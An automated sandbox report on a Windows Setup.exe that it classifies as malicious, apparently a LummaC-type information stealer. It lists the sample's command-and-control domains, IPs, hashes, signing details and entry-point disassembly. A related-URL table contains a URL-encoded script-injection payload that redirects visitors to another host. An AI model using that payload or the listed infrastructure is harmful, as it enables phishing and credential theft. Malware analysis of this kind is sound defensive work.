              https://cheapptaxysu.click:443/api0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              cheapptaxysu.click
              172.67.177.88
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                necklacebudi.latfalse
                  high
                  aspecteirs.latfalse
                    high
                    https://cheapptaxysu.click/apifalse
                      high
                      sustainskelet.latfalse
                        high
                        crosshuaht.latfalse
                          high
                          rapeflowwj.latfalse
                            high
                            cheapptaxysu.clicktrue
                            • Avira URL Cloud: safe
                            unknown
                            energyaffai.latfalse
                              high
                              grannyejh.latfalse
                                high
                                discokeyus.latfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://cheapptaxysu.click/ySetup.exe, 00000000.00000003.1853982813.0000000000B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.cloudflare.com/learning/access-management/phishing-attack/Setup.exe, 00000000.00000003.1831888176.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1831909637.0000000000B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://cheapptaxysu.click/apiMXNcSetup.exe, 00000000.00000003.1967648591.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968748847.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1993073518.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Setup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Setup.exe, 00000000.00000003.1878218138.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855536746.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877972918.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855671839.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877742491.00000000035BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://cheapptaxysu.click:443/apiSetup.exe, 00000000.00000003.1967648591.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968748847.0000000000B45000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cheapptaxysu.click/apihSetup.exe, 00000000.00000003.1924862652.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1925122513.0000000003571000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiSetup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.remobjects.com/psSetup.exefalse
                                                  high
                                                  http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSetup.exe, 00000000.00000003.1855671839.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.innosetup.com/Setup.exefalse
                                                            high
                                                            https://cheapptaxysu.click/Setup.exe, 00000000.00000002.2014413389.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1853982813.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1992831324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968748847.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1925122513.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2014507406.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1948547034.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1967648591.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1993015186.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Setup.exe, 00000000.00000003.1925122513.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSetup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cheapptaxysu.click/apispSetup.exe, 00000000.00000003.1853982813.0000000000B44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSetup.exe, 00000000.00000003.1925122513.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Setup.exe, 00000000.00000003.1878218138.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855536746.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877972918.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855671839.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877742491.00000000035BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cheapptaxysu.click/QSetup.exe, 00000000.00000003.1853982813.0000000000B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.cloudflare.com/5xx-error-landingSetup.exe, 00000000.00000003.1831888176.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1831909637.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1853982813.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1832008489.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.dk-soft.org/Setup.exefalse
                                                                                        high
                                                                                        https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cheapptaxysu.click/api1pdSetup.exe, 00000000.00000003.1853982813.0000000000B44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSetup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.microsofSetup.exe, 00000000.00000003.1855536746.00000000035C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1855671839.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cheapptaxysu.click/apiBSetup.exe, 00000000.00000003.1877874726.0000000003566000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1878004622.0000000003570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    172.67.177.88
                                                                                                    cheapptaxysu.clickUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1580155
                                                                                                    Start date and time:2024-12-24 02:58:04 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 4m 44s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:4
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:Setup.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                                    EGA Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 4
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Stop behavior analysis, all processes terminated
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target Setup.exe, PID 5064 because there are no executed function
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    TimeTypeDescription
                                                                                                    20:59:11API Interceptor8x Sleep call for process: Setup.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    172.67.177.88file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                        http://click.accelo.com/ls/click?upn=c0iB0xQ4ZTg13yjvbQXmi3E3-2FYICuYinqI3Eu3HkLVg-3DaItC_JvGHKpbJferqo4wFvApnpaVwt1KUo-2BlGINtA-2F491YuuYKjAyUTOOwaM47XSKrX4SnW-2Fau-2F6FV-2Bn4CFCF2r0LA6vLlt1xoh9D-2F06a1peHqd6CpkWJ4zPSDCvwvCjm6-2BMoLYRcc-2Fx4Iapejg1Bnr-2FecmA6tdCw5t2p0JBd5znAms58ofvnjqcczVMJYyOQy58ZhyqExzVmv7Op27kcIqI2EViuk0T4gg51j82pQCW-2B1A-2F5ZEsa5g1crqa2JDcBSrNaoTtZfZCjTZguyx-2FjCmC3ySkusy5GIeIKkWbLfmKXJ6PwHXv-2BxhYKSlWnehJ9X2Pu#jmyllrvqkxwa=qeqokzfpdnls1e564ta00lgjk002vx4020750f0362005gw7yGet hashmaliciousUnknownBrowse
                                                                                                          https://storage.googleapis.com/tf3no4swz21zlasg/75752b9.html#FDm8vwZK.aspx?fRl9xNccwwPcczDyScdcNRddcH77xncsXcbbb4XGet hashmaliciousUnknownBrowse
                                                                                                            https://hantal.fanlink.tv/o7IZGet hashmaliciousUnknownBrowse
                                                                                                              https://inlook.fi/?s=%22%2F%3C%2Fscript%3E%3Cscript%3Ewindow%5B%27location%27%5D%5B%27replace%27%5D%28%5B%27h%27%2C%27t%27%2C%27t%27%2C%27p%27%2C%27s%27%2C%27%3A%27%2C%27%2F%27%2C%27%2F%27%2C%27j%27%2C%27i%27%2C%27n%27%2C%27x%27%2C%27m%27%2C%27u%27%2C%27x%27%2C%27.%27%2C%27c%27%2C%27o%27%2C%27m%27%2C%27%2F%27%2C%271%27%2C%270%27%2C%270%27%2C%278%27%2C%273%27%2C%275%27%2C%27e%27%2C%274%27%2C%27e%27%2C%275%27%2C%27d%27%2C%278%27%2C%275%27%2C%274%27%2C%27e%27%2C%274%27%2C%278%27%2C%270%27%2C%270%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%5B%27opacity%27%5D%3D0x0%3B%3C%2Fscript%3EGet hashmaliciousPhisherBrowse
                                                                                                                http://yhtc.waitslotvip.shop/4twZzp2966ZfQW273ylszwngjeo14478IENNWZNBABFXSHI196580PMUT9061Y12Get hashmaliciousPhisherBrowse
                                                                                                                  http://kugs.vipku.org/4EameH2979CPbk273kjuzxrriqa14014SCJHJGOXVHMJBHR889062RABJ9063b12Get hashmaliciousPhisherBrowse
                                                                                                                    http://9k1.lawstore.me/?dD1jJmQ9MjIwMjUmbD01NDIzJmM9MTU5ODA5JmF1PTA=Get hashmaliciousPhisherBrowse
                                                                                                                      http://lola.banca888b.info/4WReEa1975KJwf227rfpjpljqzg14482JCRGLGDBJKCITHK37301PDVC7685U12Get hashmaliciousPhisherBrowse
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        cheapptaxysu.clickfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                        • 104.21.67.146
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                        • 104.21.67.146
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                        • 104.21.67.146
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                        • 104.21.67.146
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                        • 104.21.67.146
                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                        • 104.21.67.146
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CLOUDFLARENETUSAdobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.29.252
                                                                                                                        Setup_W.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.44.57
                                                                                                                        iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.195.241
                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.145.201
                                                                                                                        Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.199.72
                                                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 104.21.48.1
                                                                                                                        AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.184.241
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.169.205
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 188.114.96.6
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 188.114.96.6
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Setup_W.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.177.88
                                                                                                                        No context
                                                                                                                        No created / dropped files found
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):6.592135892516571
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:Setup.exe
                                                                                                                        File size:3'467'041 bytes
                                                                                                                        MD5:95fb898ccbb30cc75342f7afca4d6fa7
                                                                                                                        SHA1:85caaaeab8f4bc0be8d29002081fbce0c37820fe
                                                                                                                        SHA256:ce6becb9c924feaa5d1b27fa38252d24f3447562317bc2b1ba261d771b50e628
                                                                                                                        SHA512:f03e2d798dad78885c6ac2c39f55428d83b1ec10093ba1367aa2595380b8e9966ba426866ec93e172d292e11d955c51d2b771fe4c9048812535304f39cf04a7b
                                                                                                                        SSDEEP:49152:gWstLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbVWhQC:StLutqgwh4NYxtJpkxhGhhQC
                                                                                                                        TLSH:B9F55B17B38C613ED06B3B364A73C690983BFA617A128D1797F45D0C8F3A5902A3E657
                                                                                                                        File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                        Icon Hash:870147476127061f
                                                                                                                        Entrypoint:0x6c6668
                                                                                                                        Entrypoint Section:.itext
                                                                                                                        Digitally signed:true
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x63ECF219 [Wed Feb 15 14:54:17 2023 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:1
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:1
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:1
                                                                                                                        Import Hash:8507116e3d0e7e02e36e7dc5b8aa1af8
                                                                                                                        Signature Valid:false
                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                        Error Number:-2146869232
                                                                                                                        Not Before, Not After
                                                                                                                        • 08/04/2024 01:00:00 11/04/2027 00:59:59
                                                                                                                        Subject Chain
                                                                                                                        • CN=Google LLC, O=Google LLC, L=Mountain View, S=California, C=US, SERIALNUMBER=3582691, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                        Version:3
                                                                                                                        Thumbprint MD5:F87B1BFA8FFB860CE59A8D63EC60262F
                                                                                                                        Thumbprint SHA-1:607A3EDAA64933E94422FC8F0C80388E0590986C
                                                                                                                        Thumbprint SHA-256:2029505D14BAF18AF60A0D1A7D8B56447DB643B32FAA849D4C08D2AB1FF3A4FD
                                                                                                                        Serial:0B50CF246B263EFD85A729315158F3FF
                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        add esp, FFFFFFF0h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov eax, 006BABB4h
                                                                                                                        call 00007FC0C8248722h
                                                                                                                        mov eax, dword ptr [006CFF3Ch]
                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                        mov eax, dword ptr [eax+00000188h]
                                                                                                                        push FFFFFFECh
                                                                                                                        push eax
                                                                                                                        call 00007FC0C824CABDh
                                                                                                                        mov edx, dword ptr [006CFF3Ch]
                                                                                                                        mov edx, dword ptr [edx]
                                                                                                                        mov edx, dword ptr [edx+00000188h]
                                                                                                                        and eax, FFFFFF7Fh
                                                                                                                        push eax
                                                                                                                        push FFFFFFECh
                                                                                                                        push edx
                                                                                                                        call 00007FC0C824CAA9h
                                                                                                                        xor eax, eax
                                                                                                                        push ebp
                                                                                                                        push 006C66F9h
                                                                                                                        push dword ptr fs:[eax]
                                                                                                                        mov dword ptr fs:[eax], esp
                                                                                                                        push 00000001h
                                                                                                                        call 00007FC0C824BE04h
                                                                                                                        call 00007FC0C84F244Bh
                                                                                                                        mov eax, dword ptr [006BA7DCh]
                                                                                                                        push eax
                                                                                                                        push 006BA874h
                                                                                                                        mov eax, dword ptr [006CFF3Ch]
                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                        call 00007FC0C83F0270h
                                                                                                                        mov eax, 006B5454h
                                                                                                                        mov edx, dword ptr [006CFDB4h]
                                                                                                                        mov dword ptr [edx], eax
                                                                                                                        call 00007FC0C84F2492h
                                                                                                                        xor eax, eax
                                                                                                                        pop edx
                                                                                                                        pop ecx
                                                                                                                        pop ecx
                                                                                                                        mov dword ptr fs:[eax], edx
                                                                                                                        jmp 00007FC0C84FE20Bh
                                                                                                                        jmp 00007FC0C8241027h
                                                                                                                        call 00007FC0C84F21DAh
                                                                                                                        mov eax, 00000001h
                                                                                                                        call 00007FC0C8241B10h
                                                                                                                        call 00007FC0C824146Bh
                                                                                                                        mov eax, dword ptr [006CFF3Ch]
                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                        mov edx, 006C688Ch
                                                                                                                        call 00007FC0C83EFD3Ah
                                                                                                                        push 00000005h
                                                                                                                        mov eax, dword ptr [006CFF3Ch]
                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                        mov eax, dword ptr [eax+00000188h]
                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x2de0000x97.edata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2d90000x39ba.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e10000x70a00.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x349da10x4980.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2e00000x18.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2d99f00x8c4.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2dd0000xbde.didata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
